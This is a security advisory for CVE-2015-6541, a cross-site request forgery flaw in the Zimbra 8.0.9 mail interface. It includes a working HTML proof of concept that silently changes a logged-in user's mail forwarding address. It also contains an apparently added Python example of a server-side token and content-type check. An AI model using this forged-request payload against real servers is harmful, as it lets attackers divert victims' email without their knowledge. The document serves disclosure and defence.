Packet Storm ID: PACKETSTORM:135964

Zimbra 8.0.9 GA Cross Site Request Forgery

2016-02-26 00:00:00
Damien Cauquil
packetstormsecurity.com

EPSS: 0.008 (Low), percentile 82.2%

======================================
Multiple CSRF in Zimbra Mail interface
======================================
  
  
CVE-2015-6541  
  
Description  
===========  
  
Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, allowing an attacker to change account
preferences such as e-mail forwarding on behalf of a logged-in user.
  
  
CSRF  
====  
  
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because they lack a CSRF token tied to a valid session.
As a consequence, requests can be forged and replayed arbitrarily.
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
----------------  
Proof of Concept  
----------------  
  
```html
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">[email protected]</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">[email protected]</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
  
  
Solution  
========  
  
Sensitive forms should be protected by a CSRF token.  
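As an added illustration of that fix (my own example, not Zimbra's code): a hypothetical pre-dispatch check for the `/service/soap` endpoint that first refuses the `text/plain` body a cross-site HTML form produces, then requires a per-session token echoed back in an assumed `<csrfToken>` element of the `urn:zimbra` context header. The sample envelope is constructed after the PoC above; the element name and the check's placement are assumptions.

```python
import hmac
import secrets
from xml.etree import ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
ZIMBRA_NS = "urn:zimbra"
ALLOWED_CONTENT_TYPES = ("application/soap+xml",)


def issue_csrf_token():
    """Per-session secret the web client must echo back inside every SOAP request."""
    return secrets.token_urlsafe(32)


def check_soap_request(headers, body, session_token):
    """Hypothetical check run before the SOAP dispatcher. Returns (accepted, reason)."""
    # 1. A cross-site HTML form can only send text/plain, urlencoded or multipart
    #    bodies without a CORS preflight; the PoC relies on enctype="text/plain".
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype not in ALLOWED_CONTENT_TYPES:
        return False, f"unexpected Content-Type {ctype!r}"
    # 2. The body must be a well-formed SOAP envelope.
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    if root.tag != f"{{{SOAP_NS}}}Envelope":
        return False, "not a SOAP envelope"
    # 3. The token sits in the urn:zimbra context header (element name assumed) and
    #    must equal the one issued to this session; compare in constant time.
    tok = root.find(f"{{{SOAP_NS}}}Header/{{{ZIMBRA_NS}}}context/csrfToken")
    if tok is None or not hmac.compare_digest(tok.text or "", session_token):
        return False, "missing or mismatched CSRF token"
    return True, "ok"


def envelope(csrf_token=None):
    """Constructed ModifyPrefsRequest shaped like the advisory's PoC (sample data)."""
    tok = f'<csrfToken xmlns="">{csrf_token}</csrfToken>' if csrf_token else ""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Header>'
        f'<context xmlns="{ZIMBRA_NS}"><account xmlns="" by="name">victim@example.test</account>{tok}'
        f'</context></soap:Header><soap:Body><BatchRequest xmlns="{ZIMBRA_NS}" onerror="stop">'
        f'<ModifyPrefsRequest xmlns="urn:zimbraAccount"><pref xmlns="" '
        f'name="zimbraPrefMailForwardingAddress">forward@example.test</pref>'
        f'</ModifyPrefsRequest></BatchRequest></soap:Body></soap:Envelope>\r\n'
    ).encode()
```

The form post from the PoC fails at step 1 regardless of its body, and a request that spoofs the content type still fails at step 3 without the session's token.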
  
  
Fixes  
=====  
  
Fixed in the 8.5 release: bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
  
  
Affected versions  
=================  
  
* Zimbra <= 8.0.9 GA Release  
  
  
Credits  
=======  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)  
  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
